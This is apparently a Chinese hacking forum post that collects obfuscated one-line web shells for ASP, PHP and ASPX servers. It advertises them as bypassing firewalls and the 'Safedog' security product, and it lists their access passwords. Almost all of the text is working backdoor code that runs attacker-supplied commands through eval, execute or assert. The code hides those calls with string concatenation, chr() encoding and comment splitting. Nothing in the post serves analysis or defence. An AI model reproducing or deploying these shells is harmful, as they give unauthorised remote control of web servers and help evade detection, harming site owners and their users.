几个变性的asp–过防火墙 过狗效果都不错
<%Y=request("x")%> <%execute(Y)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>
这个是90sec发的
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
密码-7
几个变性的php–过防火墙 过狗效果都不错:
<!--?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?-->
<!--?php $lang = (string)key($_POST);$lang($_POST[‘sz‘]); ?-->
<!--?php $k="ass"."ert"; $k(${"_PO"."ST"} [‘sz‘]);?-->
<!--?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?-->
这个是90sec发的
<!--?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?-->
密码-7
aspx的 过狗效果不怎么样—不过我认为能支持aspx 百分之8/90支持asp
90sec发的
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
密码-7
<%@ Page Language="Jscript"%><%eval(Request.Item["sz"],"unsafe");%>
<script type="text/javascript" language="C#">// <![CDATA[
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
// ]]></script>
密码是webadmin